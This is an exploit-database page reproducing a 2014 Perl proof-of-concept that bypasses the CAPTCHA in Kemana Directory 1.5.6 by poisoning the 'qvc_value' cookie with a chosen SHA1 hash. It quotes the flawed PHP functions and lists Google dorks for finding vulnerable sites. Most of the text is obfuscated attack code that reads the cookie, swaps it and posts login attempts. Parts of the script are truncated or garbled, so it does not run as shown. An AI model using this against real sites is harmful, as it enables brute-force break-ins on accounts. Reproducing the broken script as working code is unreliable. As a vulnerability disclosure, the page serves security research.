Kemana Directory 1.5.6 – ‘qvc_init()’ Cookie Poisoning CAPTCHA Bypass

  • 作者: LiquidWorm
    日期: 2014-03-25
  • 类别:
  • 来源:
  • #!C:\Perl64\bin\perl.exe
    # Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
    # Vendor: C97net
    # Product web page:
    # Affected version: 1.5.6
    # Summary: Experience the ultimate directory script solution with Kemana.
    # Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
    # including: CMS engine based on our qEngine, multiple directories support,
    # user friendly administration control panel, easy to use custom fields,
    # unsurpassed flexibility.
    # Desc: The CAPTCHA function for Kemana Directory is prone to a security
    # bypass vulnerability that occurs in the CAPTCHA authentication routine.
    # The function 'qvc_init()' in '/includes/function.php' sets a cookie with
    # a SHA1-based hash value in the Response Header which can be replaced by
    # a random SHA1 computed hash value using Cookie Poisoning attack. Successful
    # exploit will allow attackers to bypass the CAPTCHA-based authentication
    # challenge and perform brute-force attacks.
    # =============================================================================
    # /includes/function.php:
    # -----------------------
    # 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
    # 1775:
    # 1776:
    # 1777: // qVC - the simplest visual confirmation engine yet
    # 1778: // use qvc_init() --> <img src=""> --> compare qvc_value() == sha1 (strtolower($user_input) )?
    # 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
    # 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
    # 1781: function qvc_init ($num = 5)
    # 1782: {
    # 1783: 	if ($num == 3)
    # 1784: 		$value = mt_rand (100, 999);
    # 1785: 	else
    # 1786: 		$value = random_str (5);
    # 1787: 	ip_config_update ('visual', $value);
    # 1788: 	setcookie ('qvc_value', sha1 ($value), 0, '/');
    # 1789: }
    # 1790: 
    # 1791: 
    # 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
    # 1793: function qvc_value ()
    # 1794: {
    # 1795: 	$correct_val = cookie_param ('qvc_value');
    # 1796: 
    # 1797: 	// block browser BACK
    # 1798: 	qvc_init ();
    # 1799: 	return $correct_val;
    # 1800: }
    # =============================================================================
    # Tested on: Microsoft Windows 7 Professional SP1 (EN)
    #Apache/2.4.7 (Win32)
    #MySQL 5.6.14
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2014-5175
    # Advisory URL:
    # Dork #1: intitle:powered by
    # Dork #2: intitle:powered by qEngine
    # Dork #3: intitle:powered by
    # Dork #4: intitle:powered by
    # 08.03.2014
    use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
    print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
    print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
    print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
    =~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
    "joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
    $cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
    ;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
    "HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
     | |
     | Kemana Directory CAPTCHA Bypass PoC Exploit |
     | |
     |ID: ZSL-2014-5175|
     | |